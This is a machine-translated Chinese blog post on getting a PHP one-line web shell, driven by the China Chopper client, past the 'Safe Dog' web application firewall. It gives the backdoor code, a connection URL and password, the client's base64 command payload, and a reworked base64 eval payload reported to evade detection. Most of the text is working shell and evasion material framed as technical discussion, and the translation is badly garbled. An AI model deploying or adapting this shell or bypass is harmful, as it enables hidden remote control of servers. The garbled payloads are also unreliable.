PHP A word back door through the dog posture thousands of transmission layer processing

Since the Trojan is ready, then want to use the Trojan, there must be a data transmission process, data submission is necessary, the data return will also have a general, unless the implementation of SPECIAL commands.

When we use a common kitchen knife to connect the back door, how to submit data, how to recognize the dog, the following combination of an example, in an easy-to-understand way to demonstrate the data submission layer directly over the dog principle.

The meaning of this article: even though there are many ways to modify the kitchen knife over the dog, but I have looked under, the limitations are relatively large, and not too systematic, the new study may be just one tress

Environment:

Both the domain name and the server are personal and authentic.

The server opens the website security dog + Server security dog, the engine is all turned on, the highest level of protection.

Contrast environment:

Server: apache+php5.3; Local: nginx+php5.3 no dog environment as a comparison

Local with a dog server with the same backdoor code and link way

Description: This article only analyzes the dog principle and code implementation, technical aspects of discussion, kitchen knives or other software production and modification of this article is not discussed.

Backdoor file:

$a =array (Base64_decode ($_request[' a '));

@array_map ("assert", $a);

Chopper connection method: http://localhost/test.php?xx=YXNzZXJ0KCRfUkVRVUVTVFsnc29maWEnXSk= Password: Sofia

The document feature level can be over the dog, as the previous article has mentioned,

We know that the chopper has been around for so many years, the safety dog has long been on the characteristics of the kitchen knife clear, we first look at the time when the chopper connection features what.

This is my random connection of a backdoor, in fact no matter what the backdoor code, open File management, the kitchen knife submitted data are the same,

The code is:

[Email protected] (Base64_decode ($_post[z0])); &z0= Qgluav9zzxqoimrpc3bsyxlfzxjyb3jziiwimcipo0bzzxrfdgltzv9saw1pdcgwkttac2v0x21hz2ljx3f1b3rlc19ydw50aw1lkdapo2vjag8oii0 %2bfcipozskrd1kaxjuyw1lkcrfu0vsvkvswyjtq1jjufrfrklmru5btuuixsk7zwnobyakrc4ixhqio2lmkhn1ynn0cigkrcwwldepit0ilyipe2zvcmvhy2 Gocmfuz2uoikeilcjaiikgyxmgjewpawyoaxnfzglykcrmlii6iikpzwnobygktc4ioiipo307zwnobygifdwtiik7zgllkck7

Command execution code, the Base64_decode result is the following, gets the current directory and the disk name

@ini_set ("Display_errors", "0"), @set_time_limit (0); @set_magic_quotes_runtime (0); Echo ("->|");; $D =dirname ($_server["Script_filename"); Echo $D. " \ t ", if (substr ($D, 0,1)! ="/") {foreach (Range (" A "," Z ") as $L) if (Is_dir ($L.": ")) echo ($L.": ");}; Echo ("|<-");d ie ();

Where the parameter name "Sofia" is our so-called chopper password do not need to explain it?

So let's take a look at the post data of the chopper manually submitted locally:

Local normal return to the current directory and disk name, and the server is not displayed, must be intercepted, it turns out this is true:

Then why didn't you pop out of the Intercept box?

According to my experience, the General Document feature layer can detect is the back door, will pop the window, the data layer generally do not play, of course, this is only my personal opinion, may not be rigorous.

In fact, the dog's back door detection file characteristics and data submission detection mechanism is completely independent.

To verify this, I created a null.php in the same directory with the normal code:

Normal output when not post data, stating that the file itself is not a problem

Send the dog's post data to try?

Did not echo, and then go to the dog log to see:

Characteristic analysis of kitchen knife

So obviously, the chopper's post data is already a big feature.

I believe you can see that this eval is too conspicuous (of course, other versions or other WAF may be detected by $_post, or Base64_decode)

[Email protected] (Base64_decode ($_post[z0]));

Although it seems that data submissions do not focus on concealment, they have to admit that the chopper is a great invention.

Because the PHP backdoor, the type and format of the acceptance data are different, so the kitchen knife in the post data again constructs a code of execution, so that the PHP back door received all the data unified: "eval (' Execute command ')", so that the use of the chopper is so strong.

Specific code execution and return please refer to the previous section

Modify Post Data

Now that the reason is clear, we'll modify the post data next, and the focus of the change is to replace the eval feature.

Train of thought: separate "eval" four letters

But the post data in the space is too small, temporarily did not think of any good way.

Idea two: Modify the Backdoor file, execute the statement directly

There may be some other callback function, or other wretched posture, that can be used to execute pure execution statements directly from Post's base64 encryption.

Idea three: directly construct the eval statement by hand

As mentioned earlier, the final result of the post data is eval (' Execute command '), and our statement is decode for the A parameter.

$a =array (Base64_decode ($_request[' a '));

Then just base64 the entire eval statement and encrypt it.

So the original use of our chopper can be structured like this:

Eval (' @ini_set ("display_errors", "0"), @set_time_limit (0); @set_magic_quotes_runtime (0); Echo ("->|");; $D =dirname ($_server["Script_filename"); Echo $D. " \ t ", if (substr ($D, 0,1)! ="/") {foreach (Range (" A "," Z ") as $L) if (Is_dir ($L.": ")) echo ($L.": ");}; Echo ("|<-");d ie (); ')

Then put this phrase base64 encryption, get:

Zxzhbcgnqgluav9zzxqoimrpc3bsyxlfzxjyb3jziiwimcipo0bzzxrfdgltzv9saw1pdcgwkttac2v0x21hz2ljx3f1b3rlc19ydw50aw1lkdapo2vjag8oi i0+ Fcipozskrd1kaxjuyw1lkcrfu0vsvkvswyjtq1jjufrfrklmru5btuuixsk7zwnobyakrc4ixhqio2lmkhn1ynn0cigkrcwwldepit0ilyipe2zvcmvhy2goc mfuz2uoikeilcjaiikgyxmgjewpawyoaxnfzglykcrmlii6iikpzwnobygktc4ioiipo307zwnobygifdwtiik7zgllkck7jyk=

OK, so at this point we're just passing this word to $ A, so the post data is:

A= Zxzhbcgnqgluav9zzxqoimrpc3bsyxlfzxjyb3jziiwimcipo0bzzxrfdgltzv9saw1pdcgwkttac2v0x21hz2ljx3f1b3rlc19ydw50aw1lkdapo2vjag8oi i0+ Fcipozskrd1kaxjuyw1lkcrfu0vsvkvswyjtq1jjufrfrklmru5btuuixsk7zwnobyakrc4ixhqio2lmkhn1ynn0cigkrcwwldepit0ilyipe2zvcmvhy2goc mfuz2uoikeilcjaiikgyxmgjewpawyoaxnfzglykcrmlii6iikpzwnobygktc4ioiipo307zwnobygifdwtiik7zgllkck7jyk=

Give it a try?

Return the result successfully, change a statement to try?

At this point, this is the data flow level of the dog way, of course, dog thinking thousands, not limited to this one, more is needed to explore.

Other than that

Here to tell you a little bit, the Assert function and the Eval function are completely different functions, do not think that can phpinfo () result is a dog, assert can execute Phpinfo () a class of functions, but other PHP statements still need to borrow eval, of course, Execution commands are also not limited to eval, there are various callback functions.

Written in the last

How? Do you still want to ask the chopper how to even?

At the beginning of this article, here is the discussion of the technology itself, as to how to use, then, will php people, read this text, should already have ideas,

And not PHP people, may think: "Blog hurriedly give me a Word add software, it is best to open can use", and then secretly steal happy hope it can ping the world.

I am still that sentence, the road of safety, most of us are just a scholar, want to pay more attention to technology itself, do not swell just good.

PHP A word back door through the dog posture thousands of transmission layer processing